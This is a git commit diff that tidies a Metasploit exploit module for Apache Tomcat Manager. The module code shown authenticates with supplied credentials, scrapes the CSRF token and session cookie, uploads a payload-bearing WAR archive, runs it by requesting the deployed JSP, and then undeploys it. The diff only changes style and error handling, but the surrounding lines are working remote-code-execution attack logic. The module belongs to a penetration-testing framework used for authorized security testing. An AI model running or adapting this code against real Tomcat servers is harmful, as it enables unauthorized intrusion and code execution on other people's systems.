Do easy cleanup of exploit

bug/bundler_fix
jvazquez-r7 2014-01-30 14:42:02 -06:00
parent c336133a8e
commit cebbe71dba
1 changed files with 30 additions and 35 deletions

View File

@ -159,7 +159,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
mytarget = target
if (target.name =~ /Automatic/)
if target.name =~ /Automatic/
mytarget = auto_target
unless mytarget
fail_with(Failure::NoTarget, "Unable to automatically select a target")
@ -184,14 +184,14 @@ class Metasploit3 < Msf::Exploit::Remote
:platform => mytarget.platform
}).to_s
#find CSRF Token
# find CSRF Token
res = query_manager
return nil unless res and res.code == 200
fail_with(Failure::Unknown, "Unable to access the Tomcat Manager") unless res and res.code == 200
session_id = res.get_cookies()
session_id = res.get_cookies
csrf_token = find_csrf(res)
if(csrf_token==nil)
if csrf_token.nil?
query_str = ""
else
query_str = "?path=/"
@ -204,7 +204,7 @@ class Metasploit3 < Msf::Exploit::Remote
path_tmp = normalize_uri(target_uri.path.to_s, "html", "upload") + query_str
print_status("Uploading #{war.length} bytes as #{app_base}.war ...")
boundary_identifier=rand_text_numeric(28)
boundary_identifier = rand_text_numeric(28)
warmultipart = "-----------------------------"
warmultipart << boundary_identifier
@ -225,15 +225,12 @@ class Metasploit3 < Msf::Exploit::Remote
'password' => datastore['PASSWORD'],
'cookie' => session_id,
'data' => warmultipart,
}, 20)
if (! res)
fail_with(Failure::Unknown, "Upload failed on #{path_tmp} [No Response]")
end
if (res.code < 200 or res.code >= 300)
case res.code
when 401
print_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")
end
})
fail_with(Failure::Unknown, "Upload failed on #{path_tmp} [No Response]") unless res
if res.code < 200 or res.code >= 300
print_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") if res.code == 401
fail_with(Failure::Unknown, "Upload failed on #{path_tmp} [#{res.code} #{res.message}]")
end
@ -250,25 +247,25 @@ class Metasploit3 < Msf::Exploit::Remote
#
# EXECUTE
#
jsp_path = '/' + app_base + '/' + jsp_name + '.jsp'
jsp_path = normalize_uri(app_base, "#{jsp_name}.jsp")
print_status("Executing #{jsp_path}...")
res = send_request_cgi({
'uri' => jsp_path,
'method' => 'GET'
}, 20)
})
if (! res)
print_error("Execution failed on #{app_base} [No Response]")
elsif (res.code < 200 or res.code >= 300)
print_error("Execution failed on #{app_base} [No Response]") unless res
if res and (res.code < 200 or res.code >= 300)
print_error("Execution failed on #{app_base} [#{res.code} #{res.message}]")
vprint_status(res.body)
end
#Get the new CSRF token & session id
res = query_manager
return nil unless res and res.code == 200
fail_with(Failure::Unknown, "Unable to access the Tomcat Manager") unless res and res.code == 200
session_id = res.get_cookies()
session_id = res.get_cookies
csrf_token = find_csrf(res)
if(csrf_token==nil)
@ -289,14 +286,12 @@ class Metasploit3 < Msf::Exploit::Remote
'user' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'cookie' => session_id
}, 20)
if (! res)
print_warning("WARNING: Undeployment failed on #{path_tmp} [No Response]")
elsif (res.code < 200 or res.code >= 300)
})
print_warning("WARNING: Undeployment failed on #{path_tmp} [No Response]") unless res
if res and (res.code < 200 or res.code >= 300)
print_warning("Deletion failed on #{path_tmp} [#{res.code} #{res.message}]")
end
handler
end
def query_status